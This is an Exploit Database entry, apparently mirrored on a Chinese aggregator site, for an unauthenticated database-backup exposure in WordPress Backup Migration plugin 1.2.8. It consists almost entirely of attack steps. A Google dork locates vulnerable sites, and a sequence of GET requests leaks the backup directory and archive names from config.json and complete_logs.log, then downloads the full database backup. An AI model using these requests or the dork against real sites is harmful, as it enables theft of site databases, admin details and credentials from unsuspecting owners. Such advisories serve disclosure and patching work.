WordPress Plugin Backup Migration 1.2.8 – Unauthenticated Database Backup

• Exploit Database
• 44 阅读

• 作者： Wadeek
  日期： 2023-05-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51445/

• # Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
  # Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
  # Date: 2023-05-10
  # Exploit Author: Wadeek
  # Vendor Homepage: https://backupbliss.com/
  # Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
  # Version: 1.2.8
  # Tested on: WordPress 6.2
  
  1) Get the version of the plugin.
  
  => GET /wp-content/plugins/backup-backup/readme.txt
  --------------------------------------------------------------------------
  Stable tag: 1.2.8
  --------------------------------------------------------------------------
  
  2) Get the name of the backup directory.
  
  => GET /wp-content/backup-migration/config.json
  --------------------------------------------------------------------------
  {
  [...],
  "STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
  [...],
  "OTHER:EMAIL":"admin@email.com"
  }
  --------------------------------------------------------------------------
  
  3) Get the name of the archive containing the backups.
  
  => GET /wp-content/backup-migration/complete_logs.log
  --------------------------------------------------------------------------
  BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
  --------------------------------------------------------------------------
  
  4) Build the path for the download.
  
  => GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip